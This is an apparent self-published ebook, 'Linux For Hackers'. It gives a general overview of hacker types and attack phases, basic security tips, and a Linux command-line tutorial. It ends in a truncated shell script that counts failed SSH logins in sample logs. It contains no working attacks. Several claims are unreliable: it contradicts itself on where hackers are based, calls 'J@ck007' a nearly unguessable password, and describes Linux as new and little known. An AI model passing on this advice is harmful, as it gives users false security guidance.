Linux For Hackers - Linux System Administration Guide For Basic Configuration, Network and System Diagnostic Guide To Text Manipulation and Everything On Linux Operating System


Linux For Hackers

linux system administration guide for basic configuration, network and system diagnostic guide to text manipulation and
everything on linux operating system

[Michael Smith]
Text Copyright © [Michael Smith]
All rights reserved. No part of this guide may be reproduced in any form without permission in writing from the publisher except in the case of brief quotations embodied in critical articles or
reviews.
Legal & Disclaimer
The information contained in this book and its contents is not designed to replace or take the place of any form of medical or professional advice; and is not meant to replace the need for
independent medical, financial, legal or other professional advice or services, as may be required. The content and information in this book has been provided for educational and entertainment
purposes only.
The content and information contained in this book has been compiled from sources deemed reliable, and it is accurate to the best of the Author's knowledge, information and belief. However,
the Author cannot guarantee its accuracy and validity and cannot be held liable for any errors and/or omissions. Further, changes are periodically made to this book as and when needed. Where
appropriate and/or necessary, you must consult a professional (including but not limited to your doctor, attorney, financial advisor or such other professional advisor) before using any of the
suggested remedies, techniques, or information in this book.
Upon using the contents and information contained in this book, you agree to hold harmless the Author from and against any damages, costs, and expenses, including any legal fees potentially
resulting from the application of any of the information provided by this book. This disclaimer applies to any loss, damages or injury caused by the use and application, whether directly or
indirectly, of any advice or information presented, whether for breach of contract, tort, negligence, personal injury, criminal intent, or under any other cause of action.
You agree to accept all risks of using the information presented inside this book.
You agree that by continuing to read this book, where appropriate and/or necessary, you shall consult a professional (including but not limited to your doctor, attorney, or financial advisor or
such other advisor as needed) before using any of the suggested remedies, techniques, or information in this book.
Table of Contents
Introduction
Chapter 1 : Linux Basics
Chapter 2 : A Guide on how networking command line works
Network commands
Commands related to system management
Chapter 3 : What is the use of logging for hackers
Websites and Online Shopping
Social Media
Laptops, Tablets and Mobile Phones
How Big Is My Footprint?
The Big Three Protocols - Required Reading for Any Would-Be Hacker
Chapter 4 : How to scan the server and the network
Vulnerability Scanner
Benefits of Vulnerability Scanners
Types of Vulnerability Scanners
TCP scanning
SYN scanning
UDP scanning
Window scanning
Network vulnerability scanner
Web application scanner
Password Cracking Tools
Packet Sniffers
Popular Hacking Tools
Cain and Abel
John the Ripper
Wireshark
Nessus
Nmap
Hacking Hardware
Tools in Kali Linux
Exploitation Tools
Forensics Tools
Chapter 5 : Process of hacking and how attackers cover their traces
Hacking Techniques & Tactics
Chapter 6 : Basics of cyber security
Strategies to Combat Cyber Terrorist Threats
Chapter 7 : Protect yourself from cyber attacks and secure your computer and other devices
Conclusion
Introduction
In the most elemental definition, hacking can be described as the act of exploiting the weaknesses and shortfalls in a computer system, as well as the network of such a system. In the exploitation
of these weaknesses, illegal acts might include stealing private information, accessing a network’s configuration and altering it, sabotaging the structural view of the computer’s operating system
and much more.
Hacking is practiced in almost all countries. However, it predominates in developed countries. The advancement of information and technology within the last two decades has shown that most
hackers are based in developing countries such as in South Asia and Southeast Asia.
The term “hacker” is the source of a lot of controversy today and is confusing to many people. Some regard a “hacker” as someone who has the power to make a computer do anything at will. In another context, a hacker is viewed as a computer security specialist whose primary job is to find the loopholes in a computer system or network and fix them. These loophole finders are sometimes referred to as crackers. All of these ambiguities in the world of hacking have made it hard to identify what a hacker is, a fact that also makes it extremely difficult to detect the activity of a hacker who may be playing around with your system.
A plethora of reasons are behind hacking. Some people are into hacking simply to make money. They can steal your password, break into your private information or even alter your correct
information and make it incorrect all for monetary gain. Other hackers are in the game just for a challenge or competition. Furthermore, some hackers are the computer world’s equivalent of
social miscreants, whose purpose is to gain access to a network or system. After gaining access, these hackers will render the network useless so that the users cannot use it properly.
For example, if a community is protesting against something, it can try to hack into a system as a sign of protest against the authorities. It can choose to do this instead of breaking other laws that it considers to be important.
There are different types of hackers who have various intentions. Based on their modus operandi, we can classify hackers into the following:
1. WHITE HAT HACKERS
These are the good guys because they do not have evil intentions. Perhaps they are named “white-hat” hackers because the color white signifies purity and cleanliness. They hack into a system to eliminate its vulnerabilities or as a means of carrying out research for companies or schools that focus on computer security. They are also known as ethical hackers. They perform penetration testing and assess the vulnerabilities of computer systems.
2. BLACK HAT HACKERS
Black hat hackers hack with a malicious intention of breaking every rule in the book. They hack for personal gain, as well as for monetary reasons. They are known to be from illegal communities that perfectly fit the stereotype of computer criminals. Black hat hackers use a network’s weak spots to render the system useless. These hackers will also destroy your data and information if they are given the chance to do so. When these hackers get into your system, they will threaten to expose your private information to the public with the goal of getting you to do whatever they want. Needless to say, black hat hackers will not fix vulnerabilities in your computer system or network, but will use them against you.
3. GREY HAT HACKERS
These hackers will trawl the internet and look for weaknesses in a computer system or network and hack into it. They may do this to show loopholes in the network to the network administrator and suggest ways of rectifying those loopholes for a given price.
4. BLUE HAT HACKERS
It is said that the color blue represents a member of law enforcement, although this is just a convention. These hackers are freelancers who sell their hacking skills as a service. Computer security firms hire hacking experts to test their networks so that they can be checked for weaknesses, vulnerabilities and loopholes before they are released to the public. Blue hat hackers are “good guys” and are different from grey hat hackers, whose intentions may be unpredictable.
5. ELITE HACKERS
These are hackers who are the experts in the community. In most cases, they can break into something impenetrable and also write complex hacking programs. An example of an elite hacker is Gary McKinnon. As a kid, McKinnon broke into the channels at NASA, installed viruses and deleted files. Elite status is conferred on this type of person primarily by the hacking community or group to which the person belongs.
6. SKIDDIE
These hackers are not complete newbies. The term “Skiddie” stands for “Script Kiddie.” They hack into a computer system or network by using tools that were created by other expert hackers. In most cases, they have little knowledge about the program’s background and creation. They are only there to use the programs.
7. NEWBIE
According to the encyclopedia, the word “newbie” means “A new user or a participant who is extremely new and inexperienced to carry out an activity.” Newbie hackers are beginners in the world of hacking. They have no prior knowledge or experience. They hang around at the periphery of the community with the objective of learning the ropes from their peers.
8. HACKTIVISM
This version of hacking is a process in which a community or an individual uses hacking skills to push information to the public through the hacked system. Hacktivism can be classified into two kinds:
1. Cyber terrorism: This is called terrorism because the hacker intends to break into a system with the purpose of totally destroying or damaging that system or network. The hacker will render the computer completely useless.
2. Right to information: These people will hack into a system or a network to gather confidential data from both public and private sources, making the information accessible to anyone.
9. INTELLIGENCE AGENCIES
Any country can be hacked. To keep a country safe from hacking, intelligence agencies, along with anti-cyber terrorism agencies, engage in their own form of hacking. They do this to protect their countries from foreign attacks and threats. In the normal sense, we can’t conclude that this is hacking because these agencies are acting as blue hat hackers to employ a defense strategy.
10. ORGANIZED CRIME
In many crime movies, the villain has a godfather for whom he or she works. Organized crime hackers work for bosses. They are related to black hat hackers because they commit crimes and break laws to aid in the criminal objectives of the godfather or gang to which they belong.
Before a hacker can hack into a system, he or she must complete certain processes. Some of these are:
1. RECONNAISSANCE
To avoid being hacked, you should keep your private information very secure. The word “reconnaissance” in this context is a means by which the hacker tries to gather all information regarding you (the target) and any weak spots in your system. The hacker uses this step to find as much information as possible about the target.
2. SCANNING AND ENUMERATION
Scanning involves the use of intelligent system port scanning to examine your system’s open ports and vulnerable spots. The attacker can use numerous automated tools to check and test your system’s vulnerabilities.
3. GAINING ACCESS
If the hacker was able to complete the two phases above, his/her next stage is to gain access to your system. This stage is where all of the hacker’s fun will begin. He or she will use the weaknesses discovered during the reconnaissance and scanning of your system to break into your connection. The hacker could exploit your local area network, your internet (both online or offline) or your local access to a PC. In the real sense, the moment a hacker breaks into your system or network, the hacker is considered to be the owner of that system. The security breach refers to the stage in which the hacker can use evil techniques to damage your system.
4. MAINTAINING ACCESS
In the previous phase, we said that once a black hat hacker hacks your system, it is no longer yours. In this phase, after the hacker has breached your security access and hacked your system completely, he or she can gain future access to your computer by creating a backdoor. So even if you get access to that computer system or network again, you still can’t be sure you are in total control. The hacker could install some scripts that would allow access to your system even when you think the threat is gone.
5. CLEARING TRACKS
The hacker gained access to your system and at the same time maintained access to that system. What do you think the hacker will do next? The hacker will then clear all of his or her tracks to avoid detection by security personnel or agencies so that he or she can continue using the system. In other cases, the hacker may do this just to prevent legal action against him or her. Today, many security breaches go undetected. There have been cases in which firewalls were circumvented even when vigilant log checking was in place.
By now, you should have some insight into what hacking is all about. Now we will outline the fundamental security guidelines that will protect you, your system and your information from
external threats. All of the information we will provide is based on practical methodologies that have been used successfully. These methodologies will help prevent a computer system from
being attacked and ravaged by malicious users.
Update Your OS (Operating System)
Operating systems are open to different types of attacks. On a daily basis, new viruses are released; this alone should make you cautious because your operating system might be vulnerable to a
new set of threats. This is why the vendors of these operating systems release new updates on a regular basis, so that they can stay ahead of new threats. This will help you improve your security
and reduce the risk of your system becoming a host to viruses.
Update Your Software
In the previous section, we talked about the importance of an update. Updated software is equipped with more efficiency and convenience, and even has better built-in security features. Thus, it is
imperative that you frequently update your applications, browsers and other programs.
Antivirus
Based on our research, we have seen that some operating systems are open to a lot of attacks, especially Microsoft Windows platforms. One way you can protect your system from viruses is through an antivirus program. An antivirus program can save you in many ways. There are many antivirus programs (free or paid) that you can install on your system to protect against threats. A malicious hacker can plant a virus on your system through the internet, but with a good antivirus scan, you can see the threat and eliminate it. As with any other software or program, your antivirus software needs frequent updates to be 100 percent effective.
Anti-Spyware
This program is also important, as you don’t want Trojan programs on your system. You can get many anti-spyware programs on the internet; just make sure you go for one that has received
good ratings.
Go for Macintosh
The Windows operating system is very popular and therefore many hackers and crackers target it. You may have read articles and blogs saying that Macintosh operating systems are less secure;
however, Macintosh is immune to many threats that affect Windows. Thus, we urge you to try the Macintosh platform. However, as we have explained in other chapters, no system in the world is
completely hack-proof, so don’t let your guard down.
Avoid Shady Sites
When you are browsing Facebook, you may come across unknown people who send you messages with links, some in the form of click bait. Avoid clicking on such links. Also, you must avoid
porn sites, or sites that promise you things that are too good to be true. Some of these sites promise you free music when you click on a link, while others offer free money or a movie. These sites
are run by malicious hackers who are looking for ways to harm your computer with their malware links. Take note that on some malicious sites, you don’t even have to click on anything to be
hacked. A good browser will always inform you of a bad site before it takes you there. Always listen to your browser’s warnings and head back to safety if necessary.
Firewall
If you are a computer specialist working in an organization, you might come across cases in which more than one computer system’s OS is under one network. In situations like these, you must
install software that provides a security firewall. The Windows operating system has an inbuilt firewall that you can activate and use directly. This firewall feature comes in different versions of
Windows, including Windows XP, Windows Professional, Windows 10 and the other versions.
Spam
You can be hacked from spamming too. Email providers have taken the initiative to classify emails according to a set of parameters. Some emails will be sent directly into the inbox and some
will be sent to the spam folder. To be safe, avoid opening emails that look suspicious. Some of them will have attachments that you should not open. Regardless of the security measures taken by
email providers, some spam emails will still pass their filters and come straight into your inbox. Avoid opening such emails and do not download the attachments that come with them.
Back-Up Options
Whether you are running your own business or working for an organization as an ethical hacker, it is crucial that you back up your work. Some files will contain confidential information, such as
personal files, financial data and work-related documents you cannot afford to lose. You should register with Google Drive, OneDrive and other cloud drive companies so that you can upload your files as a form of backup. You can also purchase an external hard disk and transfer all of your important files to it. Take all these security measures because a single piece of malicious software can scramble your data regardless of the antivirus you have installed. You can’t reverse some actions once they’ve been taken, so always have a backup.
Password
This is the most important aspect of security. The importance of a strong password can never be overstated. Starting from your e-mail, your documents or even a secure server, a good password is
the first and last line of defense against external threats. There are two categories of passwords: weak and strong. A weak password is made by using your mobile phone number, your name, a
family member’s name or something that can be guessed easily. Avoid using this kind of password, as even an amateur hacker can guess it.
Some people use dates such as their birthday or a special anniversary; however, that is still not safe. When creating a password, take your time and do some basic math because your password
must contain both letters and numbers. You can even combine it with special characters. For instance, if your initial password is “jack,” you can make it “J@ck007.” A password like this will be
almost impossible to guess even though it’s simple. Furthermore, avoid writing down your passwords. Your password isn’t a file that needs backup; it must be personal to you. Make sure you use
a simple password that is very strong. However, keep in mind that a strong password still doesn’t make you completely safe.
At this point, you should have an in-depth idea of what hacking is all about and some guidelines for ensuring the safety of your computer system or network. Following are general tips to follow
to avoid becoming a victim of hackers.

When you log into your email, you should avoid opening emails from unknown sources. Most importantly, do not download any attachments that come with such
emails.
Do not visit unsafe websites. Always visit websites that are secured, such as sites served over “https”. Try to only engage in safe browsing.
Before you install a new program, make sure the program is scanned to ensure it is free of viruses. Then, you want to delete any old installation files because you now
have the new installation files. This can save you if a hacker uses those old files as a backdoor.
Scan your files from time to time. Also make sure that all of the applications on your system are updated frequently to the latest version.
If you work at home, make sure you are in contact with security professionals or firms that can help you check network loopholes and rectify them as soon as possible.
Always back up your files. You can use safe cloud drives such as Google Drive or Dropbox. You can also purchase an external drive to keep your important files safe and intact.
Are you on a social network? Avoid clicking on links sent by people you don’t know. Such tempting messages can be invitations to private chat rooms or promises of
money if you click on the links. Avoid them and stay safe.
As technology is improving, so are software developers. Always make sure you are surfing the internet with a good browser. For instance, some browsers have inbuilt
virus or danger detection bots, which will alert you if you are trying to access a web page that is not safe. When you want to download a browser, go for one with better
inbuilt security features. The following browsers are recommended:
Google Chrome
Mozilla Firefox
Safari

Use the features that matter to you when you are connected to the internet with your browser. For instance, if you are not using Java or Active X while you are
connected, deactivate them in your browser. Having them connected all the time is not safe.
Research has shown that the most secure operating systems are Linux and Macintosh. If the two systems meet your needs, it is recommended that you switch to them. They are more secure, as they have had fewer incidents of hacking compared to the popular Windows systems.
When you sleep, you can still be attacked if your computer system is on and idle or in sleep mode. To prevent this, make sure your computer is completely switched off
when you are not using it. It is not possible to hack into a system that is switched off.
Chapter 1 : Linux Basics

When you think of operating systems, the two that most often come to mind are Windows and Mac OS. These are two of the most widespread, and they have been around for some time with many different versions. They are popular primarily because of the computer systems they come with, and people usually use them simply because they come pre-installed. While these two are the most popular, there is another operating system that is starting to gain some traction in the computer world: the Linux operating system.
For the most part, Linux is found on mobile devices, smartphones, and tablets, but because it is open sourced and free, there are now more people with computers and laptops that are beginning
to use Linux as their personal operating system. Since it is able to work with embedded systems, Linux is useful on mobile devices, computers, smart watches, routers, gaming consoles, controls,
and even televisions.
Linux is made with a straightforward design that a lot of programmers like. It is straightforward and has a lot of the power that other operating systems possess, but it is even easier to use. A lot of programmers like it because it is open source, meaning they are able to use it or make changes if they would like, and it has all the features that they could possibly want for computers, mobile devices, and more.
Most people are familiar with working on Windows or on the Mac OS, and they feel that Linux might not be as safe as some of the other options - but this is just simply not the case. In reality, Linux is one of the best operating systems out there. It is simply newer and not as well known as some of the other operating systems, but since it is so easy to use and can also be used on mobile devices, it is quickly growing in popularity.
How Linux came into existence:
Linux was first released during 1991. Initially, it was developed with the idea that it should be a free operating system for Intel x86 based personal computers. However, it soon changed to become a more collaborative project, meaning that the source code was free to use. Under the license terms for the operating system, it is able to be modified and used for both non-commercial and commercial distribution. Since it is compliant with POSIX, the Portable Operating System Interface, it is a very reliable operating system. The best fact about Linux is that it is open sourced and free to use, which may be why a lot of people are switching over to this operating system. Mac OSX and Windows both cost something for the user to get, and they will either have to purchase the software on their own or have it put on a computer for them. This can get costly when you factor in the number of updates required for these operating systems. Since Linux is free, you are able to update at any time without additional costs.
The open sourcing is helpful for both the programmers as well as everyday users with Linux. Programmers are able to use the various codes that are in the library in order to create some of their
own new code and release it for others to use. Those who are on Linux get the benefits of better updates, newer features, and more, all thanks to the ability of many programmers being able to
work on the system at the same time. All of this makes Linux an easy choice, especially going forward as it is compatible with both smartphones and tablets also.
Linux Components:
There are seven main components of Linux that you will encounter. They are as follows:
Availability of applications
Linux has thousands of applications that are available for the user to install right away. In fact, as soon as you install the Linux system, you will be able to install as many of the applications as
you choose. Think of the applications in Linux as similar to what you will find with the App Store and the Windows Store, where you are able to pick out the applications that you want to work
with. Once you have done some searching and found the apps that you want, you can directly download and install them to the Linux system.
Daemons
The Daemons are basically the components in Linux that are going to serve as the background services. This would be things like scheduling, printing, and sound. These are going to be launched
at one of two times; either during the boot or after you perform the desktop login.
Desktop environments
The environments for the desktop refer to the different components that work with user interaction. Some of the examples of these desktop environments include Enlightenment, Cinnamon,
Unity, and GNOME. Each of these is going to come with their own set of web browsers, calculators, file managers, configuration tools, and some other features that have been built into the
environment.
Graphical server
This is basically going to be the subsystem inside of Linux that shows the different graphics on your screen. Sometimes you will hear it being called the ‘X server’ or simply ‘X.’
The boot loader
As you keep using Linux, there comes a moment when you want to make sure that the system is going to boot up. The boot loader takes over the boot process inside of Linux. It is often seen in the form of a splash screen. Once that splash screen shows up, the system proceeds with the boot process.
The kernel
The next main component that you will see within the Linux system is known as the kernel. This is essentially the core inside of Linux. It is going to be in charge of managing the CPU,
peripheral devices, and the memory inside of the Linux operating system.
The Shell
We are going to talk about the shell in more detail later on because it is vital when working with Linux, so for now, we will keep things simple. The shell is basically going to be the command
line inside of Linux. It is going to permit various controls based on the commands that the user types into the interface. This is where you are going to type in the codes and the commands that
you want to give the computer.
Downloading Linux
Downloading this system is pretty easy to do. You merely need to visit www.ubuntu.com/downloads/desktop in order to get this to download onto your computer system. Once it has had time to
get set up, you should also take some time to add on some of the applications that you would like. Of course, you can always add additional apps later on if you would like, but it is easiest to get
started with some of the main apps right away. You can also choose to get Linux downloaded onto a USB drive so that you can place the operating system on your computer whenever you need
it. Some people like to have it running on the system at all times, and others would rather just have it on there at certain times when they are writing programs or trying to do a bit of hacking
work. Both of these methods work fine; it only depends on what you want to do with Linux. If you just want to use Linux on the side as an additional part of your system, it is best to download it
to the USB so that you can have Linux on the computer only when you need it. It can take up a lot of computer space when you have two operating systems there all the time and it can
potentially cause the other processes to slow down. On the other hand, if you would like to replace your other operating system with the Linux operating system, you can, of course, download it
to your computer. Make sure to get rid of the other operating system though to ensure that you are getting the speed that you need on your computer.
Learning some basic commands in Linux
There are a lot of commands that you will need to learn in order to get Linux to work well for your needs. Here, we will cover some of the main ones that you may find useful, and later we will get into some of the different things that you are able to do with your coding. Some of the basic commands that you should know how to perform with Linux include:
mkdir - creates directories
rm - removes a file without having a confirmation prompt come up
w - displays information about the users currently logged in to the computer, whether that is just you or more than one user on your system, as well as the system’s load average
uptime - displays information about the system: the load average, the number of users logged in, and how long the system has been running
ls - displays a list of files in a format that you are able to read. It can also show when each file was last modified.
who - displays who is logged in, with the date, time, and host information
less - lets you view your files quickly, with page up and page down
more - also gives a quick view of a file, and shows how far through the file you are as a percentage
top - displays the tasks managed by the kernel and the processor activity in real time. It also shows how the processor and memory are being used.
last - displays more information about the activity of users on the system, including the kernel version, terminal, system boot, date, and time
As you can see, Linux gives you a great deal of control from the command line, whether you are working on a server, a desktop, or an embedded device. It is free to install, yet it is stable and will often perform as well as, if not better than, the other operating systems that are available.
Chapter 2 : A Guide on how networking command line works

The previous chapter introduced the main Linux commands in outline. This chapter works through the essential ones in detail, then moves on to the commands for networking and for managing the system itself, the ones ethical hackers use most. After that you will be ready for the exercises in the following chapters.
So fire up Linux and play along. There will be exercises to test your knowledge as you go, although I will not be providing answers to all of them, because you should be able to work them out from the section you have just read:
Listing Directories and Files
ls
When you log in, you start in your home directory. This has the same name as your username and it is where your personal files and subdirectories are kept.
To find out the contents of your home directory, type in:
% ls
If there are no files in it, you will simply be returned to the prompt. Be aware that ls by itself only shows the entries whose names do not start with a dot. Files that start with a dot are hidden files, and they usually hold per-user configuration such as your shell start-up files and your SSH keys. They are hidden to keep them out of the way rather than to stop you reading them; edit them with care, and remember that, for the same reason, a dot-named file or directory is a favourite place for someone else to tuck away things they do not want you to notice.
To see all the files, including the hidden ones, in your home directory, type in
% ls -a
You will now see all files, including those that are hidden.
ls is one of those commands that can take options, and -a above is just one of them. Options change how the command works.
Making a Directory
mkdir
To make a subdirectory of your home directory to hold the files you create (for the purposes of this tutorial we will call it linuxstuff), type this in your current directory:
% mkdir linuxstuff
To see that directory, type in
% ls
Changing to Another Directory
cd
cd means change directory, from the current one to the one you name, so, to change to the directory you just created, you would type in:
% cd linuxstuff
To see the contents, of which there should not be any right now, type ls
Exercise
Go into the linuxstuff directory and then make another one called backups
. and .. Directories
Staying in the linuxstuff directory, type this in
% ls -a
You will see, and this is in all directories, two directories that are called . and ..
In Linux, a single dot (.) signifies the current directory so if you were to type in (making sure to leave a space between cd and the single dot)
% cd .
you would stay exactly where you are in the linuxstuff directory
While this might not seem to have much use at first, you will soon find that typing a dot as the name of the current directory saves quite a bit of typing, for example as the destination when copying a file into it
.. signifies the parent directory, which is the parent of the directory you are already in so if you were to type
% cd ..
you would go back one directory, in this case, to your home directory.
Note – if you get lost in your file system, simply type cd at the prompt and you will be returned straight to your home directory
Pathnames
pwd
pwd stands for print working directory, and the pathname it prints tells you exactly where you are in the file system. To see the absolute pathname of your home directory, type cd, so that you go back to the home directory, and then type in
% pwd
You should see something like this as the pathname
/home/its/ug1/ee51vn
This means that the home directory ee51vn is a subdirectory of ug1, which is a group directory; ug1 is a subdirectory of its, which is a subdirectory of home, which in turn sits in the top-level directory of the whole system, the root directory named /
Exercise
Explore your file system with the commands, cd, pwd and ls. Don’t forget, typing cd will take you back to the home directory
Understanding Pathnames
Go back to your home directory if you aren't already there and type in
% ls linuxstuff
This will list the contents of the linuxstuff directory. Now type in
% ls backups
No such file or directory
Why? You created a directory with that name earlier, but you didn't create it in the working directory; it is inside linuxstuff. So, to get at the backups directory, you either cd into linuxstuff first or you give ls the pathname
% ls linuxstuff/backups
~ (your home directory)
We can also use the tilde character (~) to refer to the home directory and to specify a path that starts at the home directory. So, if you typed in
% ls ~/linuxstuff
you would see a list of what is in the linuxstuff directory, regardless of where you currently are in the file system.
Exercise
Look at the following commands and work out what would be listed if you typed them:
% ls ~
% ls ~/..
Section Summary
Command         Meaning
ls              lists the files and the directories
ls -a           lists all files and directories, including hidden ones
mkdir           makes a new directory
cd directory    changes to the named directory
cd              changes back to the home directory
cd ~            changes back to the home directory
cd ..           changes to the parent directory
pwd             shows the pathname of the current directory
Copying Files
cp
If you wanted to copy file1 in the working directory and name the copy file2, you would type in
cp file1 file2
The examples that follow use a text file called science.txt. On the system this tutorial was written for it lives in an open-access part of the file system, and you copy it into your linuxstuff directory like this. First get back to your linuxstuff directory by typing
% cd ~/linuxstuff
Then type the following at the prompt
% cp /vol/examples/tutorial/science.txt .
Note: do not forget the dot at the end
The command says: copy the file called science.txt into the current directory, linuxstuff, keeping the same name
If that path does not exist on your system, create a file named science.txt in your linuxstuff directory yourself, containing a few paragraphs of any text; the next examples only need a text file longer than one screen
Moving Files
mv
mv file1 file2 will move or rename file1 to file2
When you use the mv command, the file is moved, not copied, so you end up with one file and not two. We can also use it to give a file a new name, by moving it to the directory it is already in under a different name.
Go back to your linuxstuff directory, make a copy of science.txt named science.bak with cp, and then type in the following
% mv science.bak backups/.
Now type ls and then ls backups and see what has happened: science.bak has moved into the backups directory
Removing a File or Directory
rm
rmdir
To delete a file, or remove it, we use the rm command. Let's make a copy of science.txt and then delete the copy
From your linuxstuff directory, type in
% cp science.txt tempfile.txt
% ls
% rm tempfile.txt
% ls
If you want to remove an entire directory, first make sure there are no files in it and then use the rmdir command. Have a go at removing the directory called backups: Linux won't allow it, because there is something in it
Exercise
Use mkdir to create a new directory named tempstuff and then use the rmdir command to remove it
Displaying File Contents on the Screen
clear
Before we move on, let's clear the terminal window of the commands already typed, so that the output of the next commands is easier to see. To do this, type
% clear
All the text is removed and you are left with the prompt. So, let's move on to the next command
cat
cat is used to concatenate and display a file’s content on your screen. Type in
% cat science.txt
You will see that the file is longer than the window, so it scrolls past, making the contents hard to read
less
This command writes the file contents to the screen one page at a time, so type in
% less science.txt
Press the space bar to see the next page and, when you have read enough, press q to quit.
Note: for long files, use less rather than cat.
head
This command writes the first ten lines of the specified file to your screen. Clear your screen and then type in:
% head science.txt
Now type
% head -5 science.txt
Look at what you got and work out what adding -5 did to the command
tail
As opposed to head, the tail command writes the last ten lines of the specified file to the screen. Clear your screen and type in:
% tail science.txt
Looking Through a File’s Contents
Using the less command, you can search for a keyword pattern in a text file. For example, to find all the instances of science in the science.txt file, you would type in
% less science.txt
and then, staying in less, type a forward slash followed by the word you want to search for:
/science
All the instances of the word on the screen are highlighted; to jump to the next instance, press n, and to go back to the previous one, press N
grep
grep is one the standard utilities on Linux and it is used to search for specific patterns or words. Clear your screen and type in
% grep science science.txt
Now you can see that the command grep prints each of the lines that have the word science in it
Or has it?
Now type in
% grep Science science.txt
grep is case sensitive and will distinguish between science and Science. If you want to ignore this case sensitivity, use -i. For example, type in
% grep -i science science.txt
If you want to search for a phrase that contains spaces, put it inside quote marks. To search for spinning top, you would type in
% grep -i 'spinning top' science.txt
Other options with the grep command are:
-v will display the lines that don’t match the specified text
-n will precede each of the matching lines with the correct line number
-c will only print out the total number of the matched lines
Have a go at these and see what the results are. You can use more than one of these in one command so, to show the number of lines that do not include Science or science, you would type in
% grep -ivc science science.txt
wc
This is a neat utility and is short for word count. If you wanted to do a total word count on the science.txt file, you would type
% wc -w science.txt
If you want to know how many lines are in the file, type:
% wc -l science.txt
Section Summary
Command               Meaning
cp file1 file2        copies file1 and names the copy file2
mv file1 file2        moves or renames file1 to file2
rm file               removes a file
rmdir directory       removes an empty directory
cat file              displays a file
less file             shows a file one page at a time
head file             displays the first 10 lines of a file (or the number given, as in head -5)
tail file             displays the last 10 lines of a file (or the number given)
grep "keyword" file   searches a file for a keyword
wc file               counts the lines, words and characters in a file
Redirection
Most of the processes started by Linux commands write to the terminal screen, which is their standard output, and many of them take their input from the keyboard, their standard input. There is a third stream, standard error, where error messages go; by default it appears on the terminal too. We have already used the cat command to write a file's contents to the terminal, so now type the following, without
specifying any file
% cat
Type a few words in using the keyboard, anything will do, and then press return
Hold down CTRL and press the d key; this signals the end of the input
When you run the cat command without a file, it reads from the keyboard and copies each line back to your terminal until it receives the end-of-input signal from CTRL+d
In Linux, we are able to redirect input and output.
Redirecting Output
The > symbol is used to redirect a command's output. For example, to create a file named list1 containing a list of fruits, we would type:
% cat > list1
Then type the names of a few fruits, pressing return after each one. For example
apple
pear
banana
then press ctrl+d
The cat command reads what was typed on the keyboard, and > sends its output to the file list1 instead of to the screen. Be careful: > creates the file if it does not exist and silently empties it first if it does, so redirecting onto a file you still need loses its contents. To read what the file contains, you would type
% cat list1
Exercise
Now, using the same method, create a file named list2, with these fruits in it – plum, orange, grapefruit, mango. Now read the file contents
Appending to Files
>> will append the standard output to a file so, if we wanted to add some more items to list1, we would type
% cat >> list1
And then the names of more fruits
grape
peach
orange
Then press CTRL+d to stop
To read the file contents, type
% cat list1
You should, by now, have two files, one containing six fruits and one containing four fruits. Now we will join the two lists using the cat command into one file named biglist. Type in
% cat list1 list2 > biglist
This will read the contents of both lists, in turn, and then output the text from each into a new file called biglist
To read the contents of biglist, type in
% cat biglist
Redirecting Input
To redirect a command's input we use the < symbol. Take sort, which sorts lines into numerical or alphabetical order. Type in
% sort

Now type some animal names in and press return after each of them:
ape
cat
dog
bird
then press CTRL+d to stop
The output would be
ape
bird
cat
dog
When you use < you can redirect input from a file instead of from the keyboard. For example, if you wanted a list of fruits sorted, you would type
% sort < biglist
The list will be sorted and output on the screen
If you wanted the sorted list to be written to a file instead, you would type
% sort < biglist > slist
Use cat to read the contents of slist
Pipes
If you want to know who is on the same system as you, you would type in
% who
One way to get a list of names that has been sorted would be to type
% who > names.txt
% sort < names.txt
This is a rather roundabout method, and you have to remember to remove the temporary names file when you are done. What you really want is to connect the output of the who command straight to the input of the sort command. That is what pipes are for, and the symbol for a pipe is a vertical bar (|). For example, if you typed in
% who | sort
you would get the same result, with no temporary file to tidy up afterwards
To find out how many users are logged in, yourself included, type in
% who | wc -l
Exercise
Use pipes to show all of the lines in list1 and list2 that have the letter p in them and then sort the results
Answer
As this is a little more complex, I have opted to show you the answer this time:
% cat list1 list2 | grep p | sort
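The grep and wc section and the redirection and pipes section above use fruit lists; the following is an added example (not from the book) that applies the same tools to the kind of data a hacker actually looks at: a few sshd log lines of the sort found in /var/log/auth.log. The six log lines are constructed for the example, and every host name, user name and address in them is made up. The script creates them in a scratch directory, counts failures with grep -c, -i and -v, writes reports with > and >>, reads one back with <, and finishes with a pipeline that finds the address with the most failed logins.

```shell
# Added example, not from the book: grep, wc, the > >> < redirections and
# pipes applied to a handful of constructed sshd log lines, the way you
# would when looking for password-guessing attempts in /var/log/auth.log.
# Every host name, user and address below is made up for the example.

make_sample_log() {                       # $1 = path of the log to create
    cat > "$1" <<'EOF'
Mar  1 10:00:01 host1 sshd[1201]: Failed password for invalid user admin from 203.0.113.5 port 50211 ssh2
Mar  1 10:00:03 host1 sshd[1201]: Failed password for invalid user admin from 203.0.113.5 port 50212 ssh2
Mar  1 10:00:09 host1 sshd[1207]: Accepted publickey for alice from 198.51.100.7 port 40022 ssh2
Mar  1 10:01:15 host1 sshd[1220]: Failed password for root from 203.0.113.9 port 51000 ssh2
Mar  1 10:01:16 host1 sshd[1225]: failed password for root from 203.0.113.5 port 51001 ssh2
Mar  1 10:02:30 host1 sshd[1233]: Accepted password for bob from 203.0.113.5 port 52000 ssh2
EOF
}

# grep is case sensitive: "Failed" and "failed" are different words.
# grep -c prints 0 and exits 1 when nothing matches; "|| true" keeps a
# zero count from aborting a script that runs under set -e.
count_failed_exact()  { grep -c  'Failed password' "$1" || true; }
count_failed_nocase() { grep -ic 'failed password' "$1" || true; }   # -i: any case
count_not_failed()    { grep -ivc 'failed password' "$1" || true; }  # -v: invert
count_lines()         { wc -l < "$1" | tr -d ' '; }                  # wc -l: lines

# Redirection.  > creates the file or silently truncates an existing one;
# >> appends.  Running this twice keeps failures.txt the same size but
# doubles successes.txt, which is exactly the difference between the two.
write_reports() {                         # $1 = log, $2 = output directory
    grep -i 'failed password' "$1" >  "$2/failures.txt"
    grep    'Accepted'        "$1" >> "$2/successes.txt"
}
count_report_lines() { wc -l < "$1" | tr -d ' '; }

# < feeds a file to a command that would otherwise read the keyboard.
# Every line starts with the date, so sorting orders them by time; the
# third field of the first sorted line is the time of the earliest failure.
first_failure_time() { sort < "$1/failures.txt" | head -n 1 | awk '{ print $3 }'; }

# Pipes: the address that failed most often.  awk prints the word after
# "from", sort | uniq -c collapses repeats into counts, sort -rn puts the
# largest count first, and the final awk keeps only the address.
top_failed_source() {                     # $1 = log
    grep -i 'failed password' "$1" \
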